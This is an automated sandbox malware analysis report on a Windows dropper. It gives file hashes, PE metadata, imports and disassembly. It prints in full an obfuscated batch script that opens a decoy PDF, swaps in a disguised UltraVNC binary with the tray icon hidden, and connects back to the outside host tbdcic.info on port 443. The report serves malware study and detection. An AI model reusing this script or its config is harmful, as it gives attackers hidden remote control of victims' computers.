                                                                    Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                                    Category:dropped
                                                                    Size (bytes):1407294
                                                                    Entropy (8bit):7.97605879016224
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/yowYIGNP4bdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oBGZd:twZG6b3mlind9i4ufFXpAXkrfUs0qWLa
                                                                    MD5:8D04FDC5022E491B91EC6B32F003430B
                                                                    SHA1:6619D46E06076B5669D4CC677D6D8F638189E46A
                                                                    SHA-256:7682C53053D66EF0B1A89335C88C4420226B10AFAC87A286E6E1A6BC795FEE61
                                                                    SHA-512:AA96FA56D3C5C4200BAA917D3091ADB1A5FAE7D534DD9C909D8B60AE13E902D6B71D42C2823319483414987E4B41079FA241B3D0A384EE4B281B63F834917E7D
                                                                    Malicious:false
                                                                    Preview:(gzip-compressed binary data, no readable preview)
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                    Category:dropped
                                                                    Size (bytes):386528
                                                                    Entropy (8bit):7.9736851559892425
                                                                    Encrypted:false
                                                                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                    Malicious:false
                                                                    Preview:(gzip-compressed binary data, no readable preview)
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                    Category:dropped
                                                                    Size (bytes):758601
                                                                    Entropy (8bit):7.98639316555857
                                                                    Encrypted:false
                                                                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                    MD5:3A49135134665364308390AC398006F1
                                                                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                    Malicious:false
                                                                    Preview:(gzip-compressed binary data, no readable preview)
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                    Category:dropped
                                                                    Size (bytes):1419751
                                                                    Entropy (8bit):7.976496077007677
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/pwYIGNPQxW/07oXGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:xwZG2xW/xXGZn3mlind9i4ufFXpAXkru
                                                                    MD5:64519B3A50204131E7CD6FFCD844ACD7
                                                                    SHA1:197EFD8661422562DD58600674F275EAE39E348C
                                                                    SHA-256:C2FDD4384B808A99B2F0D3DDDF227795FC3EEE937DD30A2C1D41DC8E5449031E
                                                                    SHA-512:33B7A0B69494553B57F537ED1E49A24280290ACB8A9703D615A1D182BA64CF02D67AF0A48BBA664CA4315B515A1AF63A9E92FB02D1BFB0648CF147F1EBD9EA4B
                                                                    Malicious:false
                                                                    Preview:(gzip-compressed binary data, no readable preview)
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                    Category:dropped
                                                                    Size (bytes):605114
                                                                    Entropy (8bit):7.931189302613814
                                                                    Encrypted:false
                                                                    SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                    MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                    SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                    SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                    SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                    Malicious:false
                                                                    Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:DOS batch file, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1063
                                                                    Entropy (8bit):5.5415018235723945
                                                                    Encrypted:false
                                                                    SSDEEP:24:gDo8Dlr0RMqL0LtvJW2urcW1SalC/ki2wpx/m:aEb2AhFWx/m
                                                                    MD5:651796E1EB5F2C51A6DD6929A65184DA
                                                                    SHA1:C475C14C2D71453126FBDE6E135C4B68801A0E9F
                                                                    SHA-256:8F0E40CBAAA9C09FA66C18BB90B54FD373EAEF4328E166EB5D0A3EE036F8DD49
                                                                    SHA-512:C76F34CD8F7BC54A2D229B6DE8C0899FD676DB75001BAF0A7394655BE85CCE65539D3B7D1565A2381ADECF851615B9A989C9D83B22B6732BA4272026D9D8454F
                                                                    Malicious:false
                                                                    Preview (one batch line per row; the sandbox renders the original line breaks as "."):
                                                                      @echo off
                                                                      setlocal enabledelayedexpansion
                                                                      set dLblEw=nhost
                                                                      set H9zjF6=nne
                                                                      set Ely6ya=co
                                                                      set rsZWbB=exe
                                                                      set e2uPdm=Lom
                                                                      set RscJfa=pdf
                                                                      set DE4CBb=raVNC
                                                                      set jq2jOU=%COMPUTERNAME%
                                                                      set q6noQx=autore
                                                                      set WWfq61=%WINDIR%\Tasks\698563441.cmd
                                                                      set AMDK6l=tbdcic.info
                                                                      set qC9Ryl=Thj0Wf
                                                                      set eUynLD=443
                                                                      set uTrzGi=co
                                                                      set ayToqv=ct
                                                                      set nM9rdS=Ult
                                                                      set TfRayV=sync_browser
                                                                      set erudre=ini
                                                                      timeout /t 1
                                                                      copy "gTFLK1.jBd3Ei" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%" & start "" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%"
                                                                      timeout /t 1
                                                                      taskkill /f /im %TfRayV%.%rsZWbB%
                                                                      timeout /t 2
                                                                      copy "GIjul8.QTIrrr" "%TfRayV%.%rsZWbB%"
                                                                      timeout /t 1
                                                                      copy "CEpr8q.li7XUg" "%nM9rdS%%DE4CBb%.%erudre%"
                                                                      timeout /t 2
                                                                      start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB%
                                                                      timeout /t 8
                                                                      start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% -%q6noQx%%Ely6ya%%H9zjF6%%ayToqv% -id:%jq2jOU%_%qC9Ryl% -%Ely6ya%%H9zjF6%%ayToqv% %AMDK6l%:%eUynLD%
                                                                      timeout /t 2
                                                                      copy "sdABZ4.E1924R" "%uTrzGi%%dLblEw%.%rsZWbB%"
                                                                      timeout /t 4
                                                                      :loop
                                                                      if exist "%WWfq61%" (
                                                                       cmd /c "%WWfq61%"
                                                                       tim
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:Generic INItialization configuration [admin]
                                                                    Category:dropped
                                                                    Size (bytes):858
                                                                    Entropy (8bit):5.216893826927931
                                                                    Encrypted:false
                                                                    SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                    MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                    SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                    SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                    SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                    Malicious:false
                                                                    Preview (one INI line per row; the sandbox renders the original CRLF line breaks as ".."):
                                                                      [Permissions]
                                                                      [admin]
                                                                      LocalInputsDisabled=0
                                                                      IdleTimeout=0
                                                                      EnableJapInput=0
                                                                      RemoveAero=0
                                                                      DebugMode=0
                                                                      Avilog=0
                                                                      path=Y:
                                                                      DebugLevel=0
                                                                      AllowLoopback=0
                                                                      LoopbackOnly=0
                                                                      AllowShutdown=1
                                                                      AllowProperties=1
                                                                      AllowEditClients=1
                                                                      FileTransferTimeout=40
                                                                      KeepAliveInterval=4
                                                                      SocketKeepAliveTimeout=14000
                                                                      DisableTrayIcon=1
                                                                      MSLogonRequired=0
                                                                      NewMSLogon=0
                                                                      ConnectPriority=0
                                                                      QuerySetting=2
                                                                      QueryTimeout=8
                                                                      QueryAccept=0
                                                                      LockSetting=0
                                                                      RemoveWallpaper=0
                                                                      RemoveEffects=0
                                                                      RemoveFontSmoothing=0
                                                                      FileTransferEnabled=1
                                                                      FTUserImpersonation=1
                                                                      BlankMonitorEnabled=0
                                                                      BlankInputsOnly=0
                                                                      DefaultScale=1
                                                                      UseDSMPlugin=0
                                                                      DSMPlugin=
                                                                      DSMPluginConfig=
                                                                      primary=1
                                                                      secondary=0
                                                                      SocketConnect=0
                                                                      HTTPConnect=0
                                                                      XDMCPConnect=0
                                                                      AutoPortSelect=1
                                                                      PortNumber=5628
                                                                      HTTPPortNumber=5800
                                                                      InputsEnabled=1
                                                                      [UltraVNC]
                                                                      passwd=F0111C75FCAEB30BD2
                                                                      passwd2=F2102C75FCAEB11BD2
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1945368
                                                                    Entropy (8bit):6.532894678367002
                                                                    Encrypted:false
                                                                    SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                    MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                    SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                    SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                    SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\GIjul8.QTIrrr, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):867840
                                                                    Entropy (8bit):6.386550733462827
                                                                    Encrypted:false
                                                                    SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                    MD5:0F568F6C821565AB9FF45C7457953789
                                                                    SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                    SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                    SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                    Category:dropped
                                                                    Size (bytes):605114
                                                                    Entropy (8bit):7.931189302613814
                                                                    Encrypted:false
                                                                    SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                    MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                    SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                    SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                    SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):867840
                                                                    Entropy (8bit):6.386550733462827
                                                                    Encrypted:false
                                                                    SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                    MD5:0F568F6C821565AB9FF45C7457953789
                                                                    SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                    SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                    SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1945368
                                                                    Entropy (8bit):6.532894678367002
                                                                    Encrypted:false
                                                                    SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                    MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                    SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                    SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                    SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.954883444349583
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:Olz7TmvkEW.exe
                                                                    File size:1'641'047 bytes
                                                                    MD5:539b0fc32045de3013d00850827654aa
                                                                    SHA1:eed973e0a66dab8e80a1403acd7beab580c34f94
                                                                    SHA256:cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651
                                                                    SHA512:8a8cde6a373509f8d535724dee8838548dfd05ad322141b8b3ccd2a30e9a3a479228e453f222792768b982ccd14c27848518add32a425e7d358041429ab3bb66
                                                                    SSDEEP:24576:WKWs4j30INmn7r9693wUGl1wuXIF1YPQx2zgWzyMZuAZnzF77/voe2D7UGxxy+vY:TFg30I8n7r+FGl+ua1vTWzzlzZoe2DNG
                                                                    TLSH:20752340B6C3C9F5ED53327618F1AD17BBB2ED290B50158F728CFA123930646A52BA77
                                                                    File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...-..P.................2...H....../8.......P....@.........................................................................$s.............................
                                                                    Icon Hash:357561d6dad24d55
                                                                    Entrypoint:0x41382f
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:
                                                                    Time Stamp:0x50E0002D [Sun Dec 30 08:49:49 2012 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:1d1577d864d2da06952f7affd8635371
                                                                    Instruction
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push FFFFFFFFh
                                                                    push 00416E98h
                                                                    push 004139C0h
                                                                    mov eax, dword ptr fs:[00000000h]
                                                                    push eax
                                                                    mov dword ptr fs:[00000000h], esp
                                                                    sub esp, 68h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    mov dword ptr [ebp-18h], esp
                                                                    xor ebx, ebx
                                                                    mov dword ptr [ebp-04h], ebx
                                                                    push 00000002h
                                                                    call dword ptr [004151DCh]
                                                                    pop ecx
                                                                    or dword ptr [0041B9E4h], FFFFFFFFh
                                                                    or dword ptr [0041B9E8h], FFFFFFFFh
                                                                    call dword ptr [004151E0h]
                                                                    mov ecx, dword ptr [004199C4h]
                                                                    mov dword ptr [eax], ecx
                                                                    call dword ptr [004151E4h]
                                                                    mov ecx, dword ptr [004199C0h]
                                                                    mov dword ptr [eax], ecx
                                                                    mov eax, dword ptr [004151E8h]
                                                                    mov eax, dword ptr [eax]
                                                                    mov dword ptr [0041B9E0h], eax
                                                                    call 00007F24D8DDB222h
                                                                    cmp dword ptr [00419780h], ebx
                                                                    jne 00007F24D8DDB10Eh
                                                                    push 004139B8h
                                                                    call dword ptr [004151ECh]
                                                                    pop ecx
                                                                    call 00007F24D8DDB1F4h
                                                                    push 00419050h
                                                                    push 0041904Ch
                                                                    call 00007F24D8DDB1DFh
                                                                    mov eax, dword ptr [004199BCh]
                                                                    mov dword ptr [ebp-6Ch], eax
                                                                    lea eax, dword ptr [ebp-6Ch]
                                                                    push eax
                                                                    push dword ptr [004199B8h]
                                                                    lea eax, dword ptr [ebp-64h]
                                                                    push eax
                                                                    lea eax, dword ptr [ebp-70h]
                                                                    push eax
                                                                    lea eax, dword ptr [ebp-60h]
                                                                    push eax
                                                                    call dword ptr [004151F4h]
                                                                    push 00419048h
                                                                    push 00419000h
                                                                    call 00007F24D8DDB1ACh
                                                                    Name                                   Virtual Address  Virtual Size  Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT           0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT           0x17324          0xc8          .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE         0x1c000          0x309f0       .rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY         0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC        0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG            0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT              0x15000          0x364         .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text   0x1000           0x130f0       0x13200   a86014994324ad6f47bddf386fd89176  False     0.6081495098039216  data       6.614408281478693   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x15000          0x3560        0x3600    9abc217bd20b39b1db2f57ddf9bc789c  False     0.4381510416666667  data       5.5938980842785995  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x19000          0x29ec        0x800     4c129856aeef51c872b4a2f6db01e9bd  False     0.44580078125       data       3.8126171673069433  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x1c000          0x309f0       0x30a00   2a495bc4a21e28ce1bddf325b402c213  False     0.7838658820694088  data       7.467752676575126   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                                 Language  Country        ZLIB Complexity
RT_ICON        0x1c280  0x18de  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced          Russian   Russia         0.9696826892868363
RT_ICON        0x1db60  0x4228  Device independent bitmap graphic, 64 x 128 x 32, image size 16896   Russian   Russia         0.08974964572508266
RT_ICON        0x21d88  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9600     Russian   Russia         0.12935684647302906
RT_ICON        0x24330  0x1a68  Device independent bitmap graphic, 40 x 80 x 32, image size 6720     Russian   Russia         0.16553254437869822
RT_ICON        0x25d98  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4224     Russian   Russia         0.21106941838649157
RT_ICON        0x26e40  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 2400     Russian   Russia         0.29508196721311475
RT_ICON        0x277c8  0x6b8   Device independent bitmap graphic, 20 x 40 x 32, image size 1680     Russian   Russia         0.33313953488372094
RT_ICON        0x27e80  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1088     Russian   Russia         0.4592198581560284
RT_GROUP_ICON  0x282e8  0x76    data                                                                 Russian   Russia         0.7457627118644068
RT_VERSION     0x28360  0x350   data                                                                 -         -              0.4693396226415094
RT_MANIFEST    0x286b0  0x33c   ASCII text, with CRLF line terminators                               English   United States  0.501207729468599
DLL           Imports
COMCTL32.dll  (no import names listed)
SHELL32.dll   SHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
GDI32.dll     CreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
ADVAPI32.dll  FreeSid, AllocateAndInitializeSid, CheckTokenMembership
USER32.dll    GetMenu, SetWindowPos, GetWindowDC, ReleaseDC, CopyImage, GetKeyState, GetWindowRect, ScreenToClient, GetWindowLongW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, EndDialog, SendMessageW, wsprintfW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, CreateWindowExW, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, MessageBoxA, GetParent
ole32.dll     CreateStreamOnHGlobal, CoCreateInstance, CoInitialize
OLEAUT32.dll  SysAllocString, VariantClear, OleLoadPicture
KERNEL32.dll  SetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, GetStartupInfoA
MSVCRT.dll    ??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _wtol, _purecall
Language of compilation system  Country where language is spoken
Russian                         Russia
English                         United States
